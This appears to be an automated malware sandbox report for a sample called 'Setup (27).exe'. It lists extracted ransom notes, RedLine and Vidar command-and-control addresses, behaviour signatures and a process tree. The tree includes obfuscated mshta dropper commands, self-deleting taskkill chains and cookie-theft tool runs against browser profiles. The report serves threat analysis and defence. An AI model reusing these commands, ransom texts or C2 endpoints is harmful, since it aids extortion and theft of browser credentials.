Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    1228s
  • max time network
    1811s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    24-08-2021 20:54

General

  • Target

    Setup (27).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Path

C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Family

buran

Ransom Note
!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. PAY FAST 500$=0.013 btc or the price will increase tomorrow bitcoin address bc1qqxnp9z0ff8x852dyflp5r9r6rzse8jl5hzmqz8 To be sure we have the decryptor and it works you can send an email: payfast290@mail2tor.com and decrypt one file for free. But this file should be of not valuable! Do you really want to restore your files? payfast290@mail2tor.com TELEGRAM @ payfast290 Your personal ID: 20C-C90-4DA Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Extracted

Path

C:\_readme.txt

Ransom Note
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-ykQaS2tRyB Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: manager@mailtemp.ch Reserve e-mail address to contact us: managerhelper@airmail.cc Your personal ID: 0328gDrgofRiXRqq62TeogIfmpihYZJ6wDmuUVD07WwczX6Bm
Emails

manager@mailtemp.ch

managerhelper@airmail.cc

URLs

https://we.tl/t-ykQaS2tRyB

Extracted

Family

redline

Botnet

supertraff

C2

135.148.139.222:1494

Extracted

Family

redline

Botnet

dibild2

C2

135.148.139.222:1494

Extracted

Family

redline

Botnet

24.08

C2

95.181.172.100:55640

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Buran

    Ransomware-as-a-service based on the VegaLocker family first identified in 2019.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 1 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 7 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • Blocklisted process makes network request 44 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Modifies extensions of user files 7 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Sets service image path in registry 2 TTPs
  • Checks BIOS information in registry 2 TTPs 28 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 9 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 14 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 23 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 29 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
  • Suspicious use of SetThreadContext 17 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 32 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 35 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 51 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 9 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 25 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 32 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 50 IoCs
  • Suspicious behavior: SetClipboardViewer 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:68
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Themes
      1⤵
        PID:1196
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2384
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Browser
          1⤵
          • Suspicious use of SetThreadContext
          PID:2752
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k SystemNetworkService
            2⤵
            • Drops file in System32 directory
            • Checks processor information in registry
            • Modifies data under HKEY_USERS
            • Modifies registry class
            PID:6416
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
            PID:2360
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2332
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
              1⤵
                PID:2272
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                1⤵
                  PID:1892
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s SENS
                  1⤵
                    PID:1356
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                    1⤵
                      PID:1288
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                        PID:1084
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                        1⤵
                        • Drops file in System32 directory
                        • Drops file in Windows directory
                        PID:932
                        • C:\ProgramData\dkuffm\dnoqhnj.exe
                          C:\ProgramData\dkuffm\dnoqhnj.exe start
                          2⤵
                            PID:6636
                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                            2⤵
                            • Checks SCSI registry key(s)
                            • Modifies data under HKEY_USERS
                            PID:8816
                          • C:\Users\Admin\AppData\Local\3f91aa05-84d5-446b-b842-210976c02746\22CC.exe
                            C:\Users\Admin\AppData\Local\3f91aa05-84d5-446b-b842-210976c02746\22CC.exe --Task
                            2⤵
                              PID:6400
                          • C:\Users\Admin\AppData\Local\Temp\Setup (27).exe
                            "C:\Users\Admin\AppData\Local\Temp\Setup (27).exe"
                            1⤵
                            • Checks computer location settings
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of WriteProcessMemory
                            PID:4084
                            • C:\Users\Admin\Documents\btQpuPm3MQ1vPRvV8FVPgNoF.exe
                              "C:\Users\Admin\Documents\btQpuPm3MQ1vPRvV8FVPgNoF.exe"
                              2⤵
                              • Executes dropped EXE
                              PID:2024
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\6148402737.exe"
                                3⤵
                                  PID:6012
                                  • C:\Users\Admin\AppData\Local\Temp\6148402737.exe
                                    "C:\Users\Admin\AppData\Local\Temp\6148402737.exe"
                                    4⤵
                                    • Executes dropped EXE
                                    • Drops file in Windows directory
                                    PID:896
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\9726136424.exe"
                                  3⤵
                                    PID:7716
                                    • C:\Users\Admin\AppData\Local\Temp\9726136424.exe
                                      "C:\Users\Admin\AppData\Local\Temp\9726136424.exe"
                                      4⤵
                                        PID:8112
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c taskkill /im "btQpuPm3MQ1vPRvV8FVPgNoF.exe" /f & erase "C:\Users\Admin\Documents\btQpuPm3MQ1vPRvV8FVPgNoF.exe" & exit
                                      3⤵
                                        PID:8136
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /im "btQpuPm3MQ1vPRvV8FVPgNoF.exe" /f
                                          4⤵
                                          • Kills process with taskkill
                                          PID:7076
                                    • C:\Users\Admin\Documents\vPfAYBHrtmrpFgjxvLJixbxp.exe
                                      "C:\Users\Admin\Documents\vPfAYBHrtmrpFgjxvLJixbxp.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      PID:2988
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2988 -s 388
                                        3⤵
                                        • Program crash
                                        PID:4056
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2988 -s 364
                                        3⤵
                                        • Program crash
                                        PID:4680
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2988 -s 404
                                        3⤵
                                        • Program crash
                                        PID:5112
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2988 -s 620
                                        3⤵
                                        • Program crash
                                        PID:5424
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2988 -s 660
                                        3⤵
                                        • Program crash
                                        PID:5236
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2988 -s 696
                                        3⤵
                                        • Program crash
                                        PID:5624
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2988 -s 724
                                        3⤵
                                        • Program crash
                                        PID:5864
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2988 -s 764
                                        3⤵
                                        • Program crash
                                        PID:1884
                                    • C:\Users\Admin\Documents\K8PsqvGKRwgAUvcqlB4mRrwV.exe
                                      "C:\Users\Admin\Documents\K8PsqvGKRwgAUvcqlB4mRrwV.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2312
                                    • C:\Users\Admin\Documents\tlItBioWsOxt4ZwlFqIVcDQO.exe
                                      "C:\Users\Admin\Documents\tlItBioWsOxt4ZwlFqIVcDQO.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:2316
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2316 -s 760
                                        3⤵
                                        • Program crash
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5468
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2316 -s 784
                                        3⤵
                                        • Program crash
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5572
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2316 -s 788
                                        3⤵
                                        • Program crash
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5688
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2316 -s 824
                                        3⤵
                                        • Program crash
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5812
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2316 -s 956
                                        3⤵
                                        • Program crash
                                        PID:5992
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2316 -s 984
                                        3⤵
                                        • Program crash
                                        PID:5172
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2316 -s 1000
                                        3⤵
                                        • Program crash
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5472
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2316 -s 1428
                                        3⤵
                                        • Program crash
                                        PID:5936
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2316 -s 1384
                                        3⤵
                                        • Program crash
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3864
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2316 -s 1368
                                        3⤵
                                        • Program crash
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5988
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2316 -s 1388
                                        3⤵
                                        • Program crash
                                        PID:6820
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2316 -s 1004
                                        3⤵
                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                        • Program crash
                                        PID:6076
                                    • C:\Users\Admin\Documents\rKj5X8MNHyTcYMkUeEIcj6B8.exe
                                      "C:\Users\Admin\Documents\rKj5X8MNHyTcYMkUeEIcj6B8.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Checks BIOS information in registry
                                      • Checks whether UAC is enabled
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3960
                                    • C:\Users\Admin\Documents\x1vV_jWAGFFqKJOz4dYvs9sH.exe
                                      "C:\Users\Admin\Documents\x1vV_jWAGFFqKJOz4dYvs9sH.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      PID:3956
                                    • C:\Users\Admin\Documents\34u1jkgmHZD0Gn0EY1WhAeIN.exe
                                      "C:\Users\Admin\Documents\34u1jkgmHZD0Gn0EY1WhAeIN.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3952
                                    • C:\Users\Admin\Documents\DBKrnIZZ6QVq3KlHDfKZ4pxR.exe
                                      "C:\Users\Admin\Documents\DBKrnIZZ6QVq3KlHDfKZ4pxR.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1216
                                      • C:\Users\Admin\AppData\Roaming\8919817.exe
                                        "C:\Users\Admin\AppData\Roaming\8919817.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2548
                                      • C:\Users\Admin\AppData\Roaming\8169971.exe
                                        "C:\Users\Admin\AppData\Roaming\8169971.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • Adds Run key to start application
                                        PID:3080
                                        • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                          "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                          4⤵
                                          • Executes dropped EXE
                                          PID:5456
                                      • C:\Users\Admin\AppData\Roaming\5439309.exe
                                        "C:\Users\Admin\AppData\Roaming\5439309.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2400
                                      • C:\Users\Admin\AppData\Roaming\5133962.exe
                                        "C:\Users\Admin\AppData\Roaming\5133962.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4476
                                    • C:\Users\Admin\Documents\e36_tLwU5Rqh8kECHiVDPkO2.exe
                                      "C:\Users\Admin\Documents\e36_tLwU5Rqh8kECHiVDPkO2.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      PID:184
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 184 -s 252
                                        3⤵
                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                        • Program crash
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:684
                                    • C:\Users\Admin\Documents\1nQ6JVhdhbmzZZCe73jgfB0a.exe
                                      "C:\Users\Admin\Documents\1nQ6JVhdhbmzZZCe73jgfB0a.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetThreadContext
                                      PID:2404
                                      • C:\Users\Admin\Documents\1nQ6JVhdhbmzZZCe73jgfB0a.exe
                                        "C:\Users\Admin\Documents\1nQ6JVhdhbmzZZCe73jgfB0a.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • Checks SCSI registry key(s)
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious behavior: MapViewOfSection
                                        PID:4736
                                    • C:\Users\Admin\Documents\rDQ3O4iP7xYx0Rx0Y2hKS3KU.exe
                                      "C:\Users\Admin\Documents\rDQ3O4iP7xYx0Rx0Y2hKS3KU.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2524
                                    • C:\Users\Admin\Documents\Yfhx_D3BjxKbGgL6dXM3zvKc.exe
                                      "C:\Users\Admin\Documents\Yfhx_D3BjxKbGgL6dXM3zvKc.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      PID:408
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 660
                                        3⤵
                                        • Program crash
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4648
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 664
                                        3⤵
                                        • Program crash
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4028
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 680
                                        3⤵
                                        • Program crash
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4224
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 732
                                        3⤵
                                        • Program crash
                                        PID:4804
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 1132
                                        3⤵
                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                        • Program crash
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4672
                                    • C:\Users\Admin\Documents\702YernoUC2jlwe95zWTCAUg.exe
                                      "C:\Users\Admin\Documents\702YernoUC2jlwe95zWTCAUg.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Checks BIOS information in registry
                                      • Checks whether UAC is enabled
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3628
                                    • C:\Users\Admin\Documents\ZrZX7YXEUOkECZcFqajprcU5.exe
                                      "C:\Users\Admin\Documents\ZrZX7YXEUOkECZcFqajprcU5.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Drops file in Program Files directory
                                      PID:4024
                                      • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                        "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • Drops startup file
                                        PID:1460
                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          4⤵
                                          • Executes dropped EXE
                                          PID:5372
                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                          4⤵
                                          • Executes dropped EXE
                                          PID:4232
                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          4⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5992
                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                          4⤵
                                          • Executes dropped EXE
                                          PID:4756
                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          4⤵
                                            PID:7012
                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                            4⤵
                                            • Executes dropped EXE
                                            PID:7104
                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            4⤵
                                            • Executes dropped EXE
                                            PID:6484
                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                            4⤵
                                              PID:6560
                                          • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                            "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • Checks whether UAC is enabled
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4296
                                          • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                            "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            PID:2440
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              4⤵
                                              • Executes dropped EXE
                                              PID:6228
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              4⤵
                                                PID:204
                                          • C:\Users\Admin\Documents\R4SUGVZjakDlzLGgNmmfqQWO.exe
                                            "C:\Users\Admin\Documents\R4SUGVZjakDlzLGgNmmfqQWO.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            PID:4064
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c taskkill /im "R4SUGVZjakDlzLGgNmmfqQWO.exe" /f & erase "C:\Users\Admin\Documents\R4SUGVZjakDlzLGgNmmfqQWO.exe" & exit
                                              3⤵
                                                PID:3136
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /im "R4SUGVZjakDlzLGgNmmfqQWO.exe" /f
                                                  4⤵
                                                  • Kills process with taskkill
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3868
                                            • C:\Users\Admin\Documents\7IgXQzFxTTuSjG80fESaBsPC.exe
                                              "C:\Users\Admin\Documents\7IgXQzFxTTuSjG80fESaBsPC.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              PID:2840
                                              • C:\Windows\SysWOW64\mshta.exe
                                                "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\Documents\7IgXQzFxTTuSjG80fESaBsPC.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\7IgXQzFxTTuSjG80fESaBsPC.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                3⤵
                                                  PID:4416
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\7IgXQzFxTTuSjG80fESaBsPC.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "" =="" for %W iN ( "C:\Users\Admin\Documents\7IgXQzFxTTuSjG80fESaBsPC.exe" ) do taskkill -IM "%~nXW" -f
                                                    4⤵
                                                      PID:4700
                                                      • C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe
                                                        WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9
                                                        5⤵
                                                        • Executes dropped EXE
                                                        PID:2128
                                                        • C:\Windows\SysWOW64\mshta.exe
                                                          "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                          6⤵
                                                            PID:6048
                                                            • C:\Windows\SysWOW64\cmd.exe
